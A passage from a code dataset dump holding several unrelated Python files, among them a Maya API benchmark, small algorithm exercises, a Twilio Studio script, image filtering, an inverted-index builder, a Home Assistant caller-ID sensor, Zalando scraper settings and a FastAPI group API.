cmds.loadPlugin(mll_path)\n\n\nif __name__ == \"__main__\":\n standalone.initialize()\n sx = 150\n sy = 150\n load_plugin()\n\n maya_cmds(sx, sy)\n openmaya_1(sx, sy)\n openmaya_2(sx, sy)\n run_cpp(sx, sy)\n \n standalone.uninitialize()\n","repo_name":"FXTD-ODYSSEY/Maya-PerfomanceTest","sub_path":"scripts/test_api_performance.py","file_name":"test_api_performance.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1116394137","text":"# data = list(range(1,21))\n# for i in range(10):\n# where = list(map(int,input().split()))\n# if where[0] == where[1]:\n# continue\n# bande = data[where[0]-1:where[1]]\n# bande.reverse()\n# del data[where[0]-1:where[1]]\n \n# t = 0\n# for j in range(where[0]-1,where[1]):\n# data.insert(j,bande[t])\n# t = t + 1\n# print(*data)\n\n\nA = list(range(1,21))\nfor _ in range(10):\n a,b = map(lambda x:int(x)-1,input().split())\n A[a:b+1] = A[a:b+1][::-1]\nprint(*A)","repo_name":"asdfqrt/barkingdog","sub_path":"02강 기초코드작성요령2/카드 역배치.py","file_name":"카드 역배치.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6939843471","text":"import os\nfrom twilio.rest import Client\n\naccount_sid = os.environ['TWILIO_ACCOUNT_SID']\nauth_token = os.environ['TWILIO_AUTH_TOKEN']\nclient = Client(account_sid, auth_token)\n\nexecution = client.studio \\\n .flows('FW8935b8a1950c90180a2e0532905c9177') \\\n .executions \\\n .create(\n to='+19082477262',\n from_='+19084607058',\n parameters={'name': 'Jefferson Elementary School'}\n )\n\nprint(execution.sid)\n\n","repo_name":"ErikaKettleson/studio-test","sub_path":"blackboard.py","file_name":"blackboard.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42799843342","text":"vowel = ('A', 'E', 'I', 'O', 'U', 'a', 'e', 'i', 'o', 'u')\n\nwhile True:\n cnt = 0\n string = input()\n if string == '#':\n break\n for i in string:\n if i in vowel:\n cnt += 1\n print(cnt)","repo_name":"LeeJeongWook/Programming","sub_path":"Online_Judge/BaekJoon/0000-4999/[1264]모음의 개수.py","file_name":"[1264]모음의 개수.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41339307845","text":"import random\nimport re\nfrom typing import List\n\nfrom telebot.types import Message\n\nfrom ashlee import emoji, utils\nfrom ashlee.action import Action\n\n\nclass Choice(Action):\n\n r_or = re.compile(r\"\\s+(или|or)\\s+\", flags=re.IGNORECASE)\n\n def get_description(self) -> str:\n return \"выбрать вариант\"\n\n def get_name(self) -> str:\n return emoji.INFO + \" Выбрать вариант\"\n\n def get_cmds(self) -> List[str]:\n return [\"choice\"]\n\n def get_keywords(self) -> List[str]:\n return [\" или \"]\n\n @Action.save_data\n @Action.send_typing\n def call(self, message: Message):\n if message.text.startswith(\"/\"):\n keyword = utils.get_keyword(message)\n else:\n keyword = utils.r_ashley.sub(\"\", message.text).strip()\n if keyword[-1::] == \"?\":\n keyword = keyword[:-1:]\n if not keyword:\n self.bot.reply_to(\n message,\n \"Пример использования \\n`/choice быть или не быть?`\",\n parse_mode=\"markdown\",\n )\n return\n variants = []\n for var in self.r_or.split(keyword):\n if var.strip().lower() == \"или\":\n continue\n elif \",\" in var:\n variants.append(var.split(\",\")[-1].strip())\n else:\n variants.append(var)\n sel = random.choice(variants)\n self.bot.reply_to(message, sel)\n","repo_name":"Tairesh/ashley","sub_path":"ashlee/actions/choice.py","file_name":"choice.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"11250065445","text":"import cv2\nimport numpy as np\n\n# Load the images \nlenna = cv2.imread('lenna.jpg', cv2.IMREAD_COLOR)\nf_16 = cv2.imread('f_16.jpg', cv2.IMREAD_COLOR)\n\n# Define the size of the Gaussian filter\nk_size = (7, 7)\n\n# Choose the enhancement factor (K) for high-boost filtering \n# I used 1,1.5,2 for first set of k values\n#set 3,2,3 for k values\n# set 5,4,5 for k values\n# set 7,4,5 for k values\nK_values = [5, 4, 5] # Experiment with different K values\n\nfor K in K_values:\n # Apply Gaussian blur to the images\n lenna_smoothed = cv2.GaussianBlur(lenna, k_size, 0)\n f_16_smoothed = cv2.GaussianBlur(f_16, k_size, 0)\n\n # Calculate the difference between the original and smoothed images\n lenna_difference = lenna - lenna_smoothed\n f_16_difference = f_16 - f_16_smoothed\n\n # Multiply the difference by the enhancement factor (K)\n lenna_enhanced = lenna + K * lenna_difference\n f_16_enhanced = f_16 + K * f_16_difference\n\n # Ensure pixel values are within the valid range [0, 255]\n lenna_enhanced = np.clip(lenna_enhanced, 0, 255).astype(np.uint8)\n f_16_enhanced = np.clip(f_16_enhanced, 0, 255).astype(np.uint8)\n\n # if both images do not display at the same time comment one out and repeat\n # Display or save the enhanced images\n cv2.imshow(f'Lenna Enhanced (K={K})', lenna_enhanced)\n cv2.imshow(f'F-16 Enhanced (K={K})', f_16_enhanced)\n cv2.waitKey(0)\n\n# Close all open windows\ncv2.destroyAllWindows()\n\n","repo_name":"cabmeron/CS474_Prog1","sub_path":"High_Boosting.py","file_name":"High_Boosting.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26670415122","text":"import numpy as np\nimport re\nfrom utils.read_doc_file import read_docs\nfrom utils.read_query_file import read_queries\nquery_list = read_queries()\n\ndocuments = list(read_docs().values())\n\n# Build a vocabulary of unique words in the documents\nvocabulary = set()\n\npattern = r'[.]'\nfor num in range(len(documents)):\n documents[num] = re.sub(pattern, '', documents[num])\n\nfor document in documents:\n vocabulary.update(document.lower().split())\n\n# Build the boolean matrix\nmatrix = np.zeros((len(documents), len(vocabulary)), dtype=int)\nfor i, document in enumerate(documents):\n words = set(document.lower().split())\n for j, word in enumerate(vocabulary):\n if word in words:\n matrix[i, j] = 1 \n\nfor query in query_list:\n query_words = query.lower().split()\n query_vector = np.array([1 if word in query_words else 0 for word in vocabulary])\n matching_documents = np.nonzero(np.all(matrix[:, query_vector == 1], axis=1))[0]\n print(matching_documents)\n","repo_name":"lttrung2001/chuyen-de-cong-nghe-phan-mem","sub_path":"BT1/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12553208965","text":"\"\"\"A sensor for incoming calls using a USB modem that supports caller ID.\"\"\"\nfrom __future__ import annotations\n\nfrom phone_modem import DEFAULT_PORT, PhoneModem\nimport voluptuous as vol\n\nfrom homeassistant.components.sensor import PLATFORM_SCHEMA, SensorEntity\nfrom homeassistant.config_entries import SOURCE_IMPORT, ConfigEntry\nfrom homeassistant.const import (\n CONF_DEVICE,\n CONF_NAME,\n EVENT_HOMEASSISTANT_STOP,\n STATE_IDLE,\n)\nfrom homeassistant.core import HomeAssistant, callback\nfrom homeassistant.helpers import config_validation as cv, entity_platform\nfrom homeassistant.helpers.typing import DiscoveryInfoType\n\nfrom .const import CID, DATA_KEY_API, DEFAULT_NAME, DOMAIN, ICON, SERVICE_REJECT_CALL\n\n# Deprecated in Home Assistant 2021.10\nPLATFORM_SCHEMA = cv.deprecated(\n vol.All(\n PLATFORM_SCHEMA.extend(\n {\n vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,\n vol.Optional(CONF_DEVICE, default=DEFAULT_PORT): cv.string,\n }\n )\n )\n)\n\n\nasync def async_setup_platform(\n hass: HomeAssistant,\n config: ConfigEntry,\n async_add_entities: entity_platform.AddEntitiesCallback,\n discovery_info: DiscoveryInfoType | None = None,\n) -> None:\n \"\"\"Set up the Modem Caller ID component.\"\"\"\n hass.async_create_task(\n hass.config_entries.flow.async_init(\n DOMAIN, context={\"source\": SOURCE_IMPORT}, data=config\n )\n )\n\n\nasync def async_setup_entry(\n hass: HomeAssistant,\n entry: ConfigEntry,\n async_add_entities: entity_platform.AddEntitiesCallback,\n) -> None:\n \"\"\"Set up the Modem Caller ID sensor.\"\"\"\n api = hass.data[DOMAIN][entry.entry_id][DATA_KEY_API]\n async_add_entities(\n [\n ModemCalleridSensor(\n api,\n entry.title,\n entry.data[CONF_DEVICE],\n entry.entry_id,\n )\n ]\n )\n\n async def _async_on_hass_stop(self) -> None:\n \"\"\"HA is shutting down, close modem port.\"\"\"\n if hass.data[DOMAIN][entry.entry_id][DATA_KEY_API]:\n await hass.data[DOMAIN][entry.entry_id][DATA_KEY_API].close()\n\n entry.async_on_unload(\n hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, _async_on_hass_stop)\n )\n\n platform = entity_platform.async_get_current_platform()\n\n platform.async_register_entity_service(SERVICE_REJECT_CALL, {}, \"async_reject_call\")\n\n\nclass ModemCalleridSensor(SensorEntity):\n \"\"\"Implementation of USB modem caller ID sensor.\"\"\"\n\n _attr_icon = ICON\n _attr_should_poll = False\n\n def __init__(\n self, api: PhoneModem, name: str, device: str, server_unique_id: str\n ) -> None:\n \"\"\"Initialize the sensor.\"\"\"\n self.device = device\n self.api = api\n self._attr_name = name\n self._attr_unique_id = server_unique_id\n self._attr_native_value = STATE_IDLE\n self._attr_extra_state_attributes = {\n CID.CID_TIME: 0,\n CID.CID_NUMBER: \"\",\n CID.CID_NAME: \"\",\n }\n\n async def async_added_to_hass(self) -> None:\n \"\"\"Call when the modem sensor is added to Home Assistant.\"\"\"\n self.api.registercallback(self._async_incoming_call)\n await super().async_added_to_hass()\n\n @callback\n def _async_incoming_call(self, new_state) -> None:\n \"\"\"Handle new states.\"\"\"\n if new_state == PhoneModem.STATE_RING:\n if self.native_value == PhoneModem.STATE_IDLE:\n self._attr_extra_state_attributes = {\n CID.CID_NUMBER: \"\",\n CID.CID_NAME: \"\",\n }\n elif new_state == PhoneModem.STATE_CALLERID:\n self._attr_extra_state_attributes = {\n CID.CID_NUMBER: self.api.cid_number,\n CID.CID_NAME: self.api.cid_name,\n }\n self._attr_extra_state_attributes[CID.CID_TIME] = self.api.cid_time\n self._attr_native_value = self.api.state\n self.async_write_ha_state()\n\n async def async_reject_call(self) -> None:\n \"\"\"Reject Incoming Call.\"\"\"\n await self.api.reject_call(self.device)\n","repo_name":"Secure-Platforms-Lab-W-M/Helion-on-Home-Assistant","sub_path":"ha-core/homeassistant/components/modem_callerid/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":4144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73109180947","text":"import re\r\n\r\nimport justext\r\nimport nltk\r\nfrom nltk.corpus import stopwords\r\nfrom pymorphy2 import MorphAnalyzer\r\n\r\npattern = re.compile(\"^[a-zA-Z]+$\")\r\nSTOPWORDS = stopwords.words('english')\r\n\r\n\r\ndef get_paragraphs_dict():\r\n result = dict()\r\n\r\n for i in range(1, 500):\r\n try:\r\n with open(f'../pages/{i}.txt', 'rb') as file:\r\n paragraphs = justext.justext(file.read(), justext.get_stoplist('English'))\r\n p = []\r\n for paragraph in paragraphs:\r\n if not paragraph.is_boilerplate:\r\n p.append(paragraph.text)\r\n result[i] = p\r\n except FileNotFoundError:\r\n continue\r\n return result\r\n\r\n\r\ndef get_lemmas_and_tokens(paragraphs_dict):\r\n nltk.download('stopwords')\r\n nltk.download('punkt')\r\n pymorphy2_analyzer = MorphAnalyzer()\r\n\r\n lemmas = dict()\r\n tokens = dict()\r\n for page_number, paragraphs in paragraphs_dict.items():\r\n l = dict()\r\n t = list()\r\n for paragraph in paragraphs:\r\n p_tokens = nltk.word_tokenize(paragraph)\r\n lowered_tokens = [token.lower() for token in p_tokens]\r\n t += [item for item in lowered_tokens if item not in STOPWORDS and pattern.match(item)]\r\n\r\n for token in t:\r\n token_normal_form = pymorphy2_analyzer.parse(token)[0].normal_form\r\n if token_normal_form in l:\r\n if token not in l[token_normal_form]:\r\n l[token_normal_form].append(token)\r\n else:\r\n l[token_normal_form] = [token, ]\r\n try:\r\n lemmas[page_number] = l\r\n tokens[page_number] = t\r\n except IndexError:\r\n continue\r\n\r\n return lemmas, tokens\r\n\r\n\r\ndef create_inverted_index(page_lemmas):\r\n all_lemmas = list()\r\n\r\n for page_num in range(1, len(page_lemmas.keys()) + 1):\r\n try:\r\n for item in page_lemmas[page_num].keys():\r\n all_lemmas.append(item)\r\n except KeyError:\r\n continue\r\n\r\n unique_lemmas = list(set(all_lemmas))\r\n unique_lemmas_dict_str = dict()\r\n unique_lemmas_dict_int = dict()\r\n\r\n for lemma in unique_lemmas:\r\n unique_lemmas_dict_int[lemma] = list()\r\n unique_lemmas_dict_str[lemma] = list()\r\n for page_num in range(1, len(page_lemmas.keys()) + 1):\r\n try:\r\n if lemma in page_lemmas[page_num].keys():\r\n unique_lemmas_dict_int[lemma].append(page_num)\r\n unique_lemmas_dict_str[lemma].append(str(page_num))\r\n continue\r\n except KeyError:\r\n continue\r\n\r\n return unique_lemmas_dict_int, unique_lemmas_dict_str\r\n\r\n\r\ndef save_result_file(inverted_index_dict):\r\n with open('inverted_index.txt', 'w', encoding='utf-8') as file:\r\n for lemma, pages in inverted_index_dict.items():\r\n file.write(f'{lemma}: {\", \".join(pages)}\\n')\r\n\r\n\r\nif __name__ == '__main__':\r\n paragraphs_dict = get_paragraphs_dict()\r\n print('Page parsed')\r\n\r\n lemmas, tokens = get_lemmas_and_tokens(paragraphs_dict)\r\n print('Lemmas and tokens were formed')\r\n\r\n inverted_index_dict_int, inverted_index_dict_str = create_inverted_index(lemmas)\r\n print('Inverted index formed')\r\n\r\n save_result_file(inverted_index_dict_str)\r\n print('Result file saved')\r\n","repo_name":"easydush/easysearch","sub_path":"index/indexer.py","file_name":"indexer.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7158812087","text":"import json\nfrom typing import List\n\nfrom core.domain import ConsumerLifestageType, GenderType, ProductCategory\n\n\ndef combine_results(\n path_2_category: dict,\n gender: str,\n consumer_lifestage: str,\n filters: list = [\n \"animal_welfare\",\n \"fair_conditions\",\n \"reducing_emissions\",\n \"reusing_materials\",\n \"sustainable_beauty\",\n \"water_saving\",\n ],\n) -> List[dict]:\n results = []\n for path, info in path_2_category.items():\n category, meta_data = info if type(info) == tuple else (info, {})\n results.append(\n {\n \"start_urls\": f\"https://www.zalando.fr/{path}/?cause={'.'.join(filters)}\",\n \"category\": category,\n \"gender\": gender,\n \"consumer_lifestage\": consumer_lifestage,\n \"meta_data\": json.dumps({\"family\": \"FASHION\", **meta_data}),\n }\n )\n return results\n\n\ndef male() -> List[dict]:\n path_2_category = {\n \"/t-shirts-basiques-homme/\": ProductCategory.TSHIRT.value,\n \"/t-shirts-imprimes-homme/\": ProductCategory.TSHIRT.value,\n \"/debardeur-homme/\": ProductCategory.TOP.value,\n \"/polos-homme/\": ProductCategory.SHIRT.value,\n \"/t-shirts-manches-longues-homme/\": ProductCategory.SHIRT.value,\n \"/t-shirt-sport-homme/\": ProductCategory.TSHIRT.value,\n \"/chemises-homme/\": ProductCategory.SHIRT.value,\n \"/sweats-capuche-homme/\": ProductCategory.SWEATER.value,\n \"/sweatshirts-homme/\": ProductCategory.SWEATER.value,\n \"/sweats-zippes-homme/\": ProductCategory.JACKET.value,\n \"/polaires-homme/\": ProductCategory.SWEATER.value,\n \"/gilets-homme/\": ProductCategory.JACKET.value,\n \"/pullovers-homme/\": ProductCategory.SWEATER.value,\n \"/vestes-homme/\": ProductCategory.JACKET.value,\n \"/manteaux-homme/\": ProductCategory.JACKET.value,\n \"/costume-homme/\": ProductCategory.SUIT.value,\n \"/vestes-costumes-homme/\": ProductCategory.JACKET.value,\n \"/chemises-classiques-homme/\": ProductCategory.SHIRT.value,\n \"/pantalons-costumes-homme/\": ProductCategory.PANTS.value,\n \"/gilets-costume-homme/\": ProductCategory.JACKET.value,\n \"/vestes-costume-homme/\": ProductCategory.JACKET.value,\n \"/jeans-homme/\": ProductCategory.JEANS.value,\n \"/pantalons-homme/\": ProductCategory.PANTS.value,\n \"/shorts-bermudas-homme/\": ProductCategory.SHORTS.value,\n \"/mode-homme-survetements/\": ProductCategory.TRACKSUIT.value,\n \"/ensemble-jogging-homme/\": ProductCategory.PANTS.value,\n \"/vestes-survetement-homme/\": ProductCategory.JACKET.value,\n \"/slips-calecons-homme/\": ProductCategory.UNDERWEAR.value,\n \"/maillots-corps-homme/\": ProductCategory.UNDERWEAR.value,\n \"/chaussettes-homme/\": ProductCategory.SOCKS.value,\n \"/pyjamas-homme/\": ProductCategory.NIGHTWEAR.value,\n \"/maillots-de-bain-homme/\": ProductCategory.SWIMWEAR.value,\n \"/serviettes-bain-homme/\": ProductCategory.TOWEL.value,\n \"/peignoirs-homme/\": ProductCategory.NIGHTWEAR.value,\n \"/poignoirs-robes-de-chambre-homme/\": ProductCategory.NIGHTWEAR.value,\n \"/t-shirts-techniques-homme/\": (ProductCategory.TSHIRT.value, {\"type\": \"SPORT\"}),\n \"/tops-homme/\": (ProductCategory.SHIRT.value, {\"type\": \"SPORT\"}),\n \"/sport-polos-homme/\": (ProductCategory.SHIRT.value, {\"type\": \"SPORT\"}),\n \"/sport-t-shirts-manches-longues-homme/\": (ProductCategory.SHIRT.value, {\"type\": \"SPORT\"}),\n \"/sport-chemises-homme/\": (ProductCategory.SHIRT.value, {\"type\": \"SPORT\"}),\n \"/maillots-entrainement-homme/\": (ProductCategory.SHIRT.value, {\"type\": \"SPORT\"}),\n \"/vestes-polaires-homme/\": (ProductCategory.JACKET.value, {\"type\": \"SPORT\"}),\n \"/sport-shorts-homme/\": (ProductCategory.SHORTS.value, {\"type\": \"SPORT\"}),\n \"/pantacourts-sport-homme/\": (ProductCategory.PANTS.value, {\"type\": \"SPORT\"}),\n \"/sport-pantalons-homme/\": (ProductCategory.PANTS.value, {\"type\": \"SPORT\"}),\n \"/collants-running-homme/\": (ProductCategory.PANTS.value, {\"type\": \"SPORT\"}),\n \"/pantalon-de-ski-homme/\": (ProductCategory.PANTS.value, {\"type\": \"SPORT\"}),\n \"/pulls-homme/\": (ProductCategory.SWEATER.value, {\"type\": \"SPORT\"}),\n \"/sport-sweats-capuche-homme/\": (ProductCategory.SWEATER.value, {\"type\": \"SPORT\"}),\n \"/sport-polaires-homme/\": (ProductCategory.SWEATER.value, {\"type\": \"SPORT\"}),\n \"/sport-sweatshirts-homme/\": (ProductCategory.JACKET.value, {\"type\": \"SPORT\"}),\n \"/survetements-homme/\": (ProductCategory.TRACKSUIT.value, {\"type\": \"SPORT\"}),\n \"/sport-sous-vetements-homme/\": (ProductCategory.UNDERWEAR.value, {\"type\": \"SPORT\"}),\n \"/sport-chaussettes-homme/\": (ProductCategory.SOCKS.value, {\"type\": \"SPORT\"}),\n \"/vetements-plage-homme/\": (ProductCategory.SWIMWEAR.value, {\"type\": \"SPORT\"}),\n \"/sport-chaussures-homme/\": (ProductCategory.SHOES.value, {\"type\": \"SPORT\"}),\n \"/sacs-dos-sport-homme/\": (ProductCategory.BACKPACK.value, {\"type\": \"SPORT\"}),\n \"/sport-sacs-homme/\": (ProductCategory.BAG.value, {\"type\": \"SPORT\"}),\n \"/baskets-homme/\": ProductCategory.SNEAKERS.value,\n \"/chaussures-basses-homme/\": ProductCategory.SHOES.value,\n \"/sandale-homme/\": ProductCategory.SHOES.value,\n \"/derbies-richelieus-homme/\": ProductCategory.SHOES.value,\n \"/chaussures-ville-homme/\": ProductCategory.SHOES.value,\n \"/boots-chaussure-montante-homme/\": ProductCategory.SHOES.value,\n \"/chaussons-homme/\": ProductCategory.SHOES.value,\n \"/sacs-bandouliere-homme/\": ProductCategory.BAG.value,\n \"/cabas-homme/\": ProductCategory.BAG.value,\n \"/sacoches-ordinateur-homme/\": ProductCategory.BAG.value,\n \"/bagages-sacs-de-sport-homme/\": ProductCategory.BAG.value,\n \"/sacs-a-dos-homme/\": ProductCategory.BACKPACK.value,\n \"/petits-sacs-homme/\": ProductCategory.BAG.value,\n \"/sacs-de-voyage-valises-homme/\": ProductCategory.BAG.value,\n }\n\n return combine_results(\n path_2_category,\n gender=GenderType.MALE.value,\n consumer_lifestage=ConsumerLifestageType.ADULT.value,\n )\n\n\ndef female() -> List[dict]:\n path_2_category = {\n \"/robes-femme/\": ProductCategory.DRESS.value,\n \"/t-shirts-femme/\": ProductCategory.TSHIRT.value,\n \"/debardeurs-femme/\": ProductCategory.TOP.value,\n \"/polos-femme/\": ProductCategory.SHIRT.value,\n \"/t-shirts-manches-longues-femme/\": ProductCategory.SHIRT.value,\n \"/chemisiers-tuniques-femme/\": ProductCategory.BLOUSE.value,\n \"/gilets-femme/\": ProductCategory.JACKET.value,\n \"/pulls-femme/\": ProductCategory.SWEATER.value,\n \"/sweatshirts-femme/\": ProductCategory.SWEATER.value,\n \"/sweats-capuche-femme/\": ProductCategory.SWEATER.value,\n \"/sweats-zippes-femme/\": ProductCategory.JACKET.value,\n \"/polaires-femme/\": ProductCategory.SWEATER.value,\n \"/vestes-femme/\": ProductCategory.JACKET.value,\n \"/manteaux-femme/\": ProductCategory.JACKET.value,\n \"/jeans-femme/\": ProductCategory.JEANS.value,\n \"/pantalons-femme/\": ProductCategory.PANTS.value,\n \"/shorts-femme/\": ProductCategory.SHORTS.value,\n \"/combinaisons-salopettes-femme/\": ProductCategory.OVERALL.value,\n \"/jupes-femme/\": ProductCategory.SKIRT.value,\n \"/lingerie-femme/\": ProductCategory.UNDERWEAR.value,\n \"/nuisettes-pyjamas-femme/\": ProductCategory.NIGHTWEAR.value,\n \"/collants/\": ProductCategory.UNDERWEAR.value,\n \"/leggings-femme/\": ProductCategory.PANTS.value,\n \"/chaussettes/\": ProductCategory.SOCKS.value,\n \"/chaussettes-de-sport-femme/\": ProductCategory.SOCKS.value,\n \"/chaussettes-hautes-femme/\": ProductCategory.SOCKS.value,\n \"/collants-femme/\": ProductCategory.SOCKS.value,\n \"/bikinis-femme/\": ProductCategory.SWIMWEAR.value,\n \"/maillots-de-bain-1-piece-femme/\": ProductCategory.SWIMWEAR.value,\n \"/t-shirts-techniques-femme/\": (ProductCategory.TSHIRT.value, {\"type\": \"SPORT\"}),\n \"/sport-polos-femme/\": (ProductCategory.SHIRT.value, {\"type\": \"SPORT\"}),\n \"/tops-femme/\": (ProductCategory.TOP.value, {\"type\": \"SPORT\"}),\n \"/sport-t-shirts-manches-longues-femme/\": (ProductCategory.SHIRT.value, {\"type\": \"SPORT\"}),\n \"/chemisiers-femme/\": (ProductCategory.BLOUSE.value, {\"type\": \"SPORT\"}),\n \"/maillots-entrainement-femme/\": (ProductCategory.SHIRT.value, {\"type\": \"SPORT\"}),\n \"/vestes-polaires-femme/\": (ProductCategory.JACKET.value, {\"type\": \"SPORT\"}),\n \"/sport-shorts-femme/\": (ProductCategory.SHORTS.value, {\"type\": \"SPORT\"}),\n \"/pantacourts-sport-femme/\": (ProductCategory.PANTS.value, {\"type\": \"SPORT\"}),\n \"/sport-pantalons-femme/\": (ProductCategory.PANTS.value, {\"type\": \"SPORT\"}),\n \"/collants-running-femme/\": (ProductCategory.PANTS.value, {\"type\": \"SPORT\"}),\n \"/pantalon-de-ski-femme/\": (ProductCategory.PANTS.value, {\"type\": \"SPORT\"}),\n \"/sport-pulls-femme/\": (ProductCategory.SWEATER.value, {\"type\": \"SPORT\"}),\n \"/sport-sweats-capuche-femme/\": (ProductCategory.SWEATER.value, {\"type\": \"SPORT\"}),\n \"/sport-polaires-femme/\": (ProductCategory.SWEATER.value, {\"type\": \"SPORT\"}),\n \"/sport-sweatshirts-femme/\": (ProductCategory.JACKET.value, {\"type\": \"SPORT\"}),\n \"/sport-robes-femme/\": (ProductCategory.DRESS.value, {\"type\": \"SPORT\"}),\n \"/sport-jupes-femme/\": (ProductCategory.SKIRT.value, {\"type\": \"SPORT\"}),\n \"/soutiens-gorge-sport-femme/\": (ProductCategory.UNDERWEAR.value, {\"type\": \"SPORT\"}),\n \"/sous-vetements-femme/\": (ProductCategory.UNDERWEAR.value, {\"type\": \"SPORT\"}),\n \"/chaussettes-femme/\": (ProductCategory.SOCKS.value, {\"type\": \"SPORT\"}),\n \"/survetements-femme/\": (ProductCategory.TRACKSUIT.value, {\"type\": \"SPORT\"}),\n \"/tenues-de-gym-justaucorps-femme/\": (ProductCategory.OVERALL.value, {\"type\": \"SPORT\"}),\n \"/vetements-plage-femme/\": (ProductCategory.SWIMWEAR.value, {\"type\": \"SPORT\"}),\n \"/sport-chaussures-femme/\": (ProductCategory.SHOES.value, {\"type\": \"SPORT\"}),\n \"/sacs-dos-sport-femme/\": (ProductCategory.BACKPACK.value, {\"type\": \"SPORT\"}),\n \"/sport-sacs-femme/\": (ProductCategory.BAG.value, {\"type\": \"SPORT\"}),\n \"/baskets-femme/\": ProductCategory.SNEAKERS.value,\n \"/chaussures-plates/\": ProductCategory.SHOES.value,\n \"/sandales-nu-pieds-femme/\": ProductCategory.SHOES.value,\n \"/sandales-de-bain-femme/\": ProductCategory.SHOES.value,\n \"/mules-sabots-femme/\": ProductCategory.SHOES.value,\n \"/ballerines-femme/\": ProductCategory.SHOES.value,\n \"/escarpins-femme/\": ProductCategory.SHOES.value,\n \"/talons-hauts-femme/\": ProductCategory.SHOES.value,\n \"/chaussures-mariee-femme/\": ProductCategory.SHOES.value,\n \"/bottines-femme/\": ProductCategory.SHOES.value,\n \"/bottes-femme/\": ProductCategory.SHOES.value,\n \"/chaussons-femme/\": ProductCategory.SHOES.value,\n \"/sacs-a-main-femme/\": ProductCategory.BAG.value,\n \"/pochettes/\": ProductCategory.BAG.value,\n \"/cabas-femme/\": ProductCategory.BAG.value,\n \"/sacs-bandouliere-femme/\": ProductCategory.BAG.value,\n \"/sacoches-ordinateur-femme/\": ProductCategory.BAG.value,\n \"/bagages-sacs-de-sport-femme/\": ProductCategory.BAG.value,\n \"/sacs-banane-femme/\": ProductCategory.BAG.value,\n \"/pochettes-etuis-femme/\": ProductCategory.BAG.value,\n \"/sacs-a-dos-femme/\": ProductCategory.BACKPACK.value,\n \"/sacs-de-voyage-valises-femme/\": ProductCategory.BAG.value,\n }\n\n return combine_results(\n path_2_category,\n gender=GenderType.FEMALE.value,\n consumer_lifestage=ConsumerLifestageType.ADULT.value,\n )\n\n\ndef get_settings() -> List[dict]:\n return male() + female()\n","repo_name":"calgo-lab/green-db","sub_path":"scraping/scraping/start_scripts/zalando_fr.py","file_name":"zalando_fr.py","file_ext":"py","file_size_in_byte":11928,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"48"} +{"seq_id":"42620872262","text":"from fastapi import FastAPI, Request\nfrom classes import *\nimport uvicorn\nfrom fastapi.responses import JSONResponse\n\nfrom fastapi.encoders import jsonable_encoder\nfrom typing import List\n\napp = FastAPI()\n\nID_GROUP = 1\nID_PARTICIPANT = 1\n\ngroups = []\nparticipants =[]\nparticipantsInGroups = []\nrecipients = []\n\ndef findInListByID(id: int, source: list):\n tmpActions = [item for item in source if item.id == id]\n if tmpActions == []:\n return -1\n else:\n return tmpActions[0]\n\ndef findGroupParticipantByID(id1: int, idperson: int):\n tmpActions = [item for item in participantsInGroups if item.ParticipantID == idperson and item.GroupID ==id1]\n if tmpActions == []:\n return -1\n else:\n return tmpActions[0]\n\n@app.post(\"/group\", status_code=202)\nasync def postPromo(request: Request):\n global ID_GROUP\n jsonbody = await request.json()\n name = jsonbody['name']\n description = jsonbody['description']\n item = Group(name=name, id=ID_GROUP, description=description)\n groups.append(item)\n ID_GROUP += 1\n return item.id\n\n@app.get(\"/groups\", response_model = List[Group], status_code=200)\nasync def getPromo():\n return groups\n\n@app.get(\"/group/{id}\")\nasync def getPromoID(id: int):\n global groups\n tmpAction = findInListByID(id, groups)\n if tmpAction == -1:\n return JSONResponse(content={\"message\": \"Resource Not Found\"}, status_code=204)\n IDparticipants = [item.ParticipantID for item in participantsInGroups if item.GroupID == id]\n if IDparticipants != []:\n tmpparticipants = [item for item in participants if item.id in IDparticipants]\n else:\n tmpparticipants = []\n return {\"id\": tmpAction.id,\n \"name\": tmpAction.name,\n \"description\": tmpAction.description,\n \"participants\": tmpparticipants}\n\n@app.put(\"/group/{id}\")\nasync def getPromoID(id: int, request: Request):\n global groups\n jsonbody = await request.json()\n name = jsonbody['name']\n description = jsonbody['description']\n if name == '':\n return JSONResponse(content={\"message\": \"Resource Not Found\"}, status_code=204)\n for i in range(len(groups)):\n if groups[i].id == id:\n groups[i].description = description\n groups[i].name = name \n break\n return \"OK\"\n\n@app.delete(\"/group/{id}\", status_code=202)\nasync def deletePromo(id: int):\n global groups\n tmp = findInListByID(id, groups)\n groups.remove(tmp)\n\n#-------------------------------\n@app.post(\"/group/{id}/participant\")\nasync def postParticipant(id: int, request: Request):\n global ID_PARTICIPANT, groups\n tmpAction = findInListByID(id, groups)\n if tmpAction == -1:\n return JSONResponse(content={\"message\": \"Resource Not Found\"}, status_code=204)\n jsonbody = await request.json()\n name = jsonbody['name']\n wish = jsonbody['wish']\n item = Participant(id=ID_PARTICIPANT,name=name,wish=wish)\n ID_PARTICIPANT += 1\n participants.append(item)\n item2 = ParticipantsInGroups(ParticipantID=item.id, GroupID=id)\n participantsInGroups.append(item2)\n return item.id\n\n@app.delete(\"/group/{id}/participant/{id2}\")\nasync def postParticipant(id: int, id2: int):\n tmpAction = findInListByID(id, 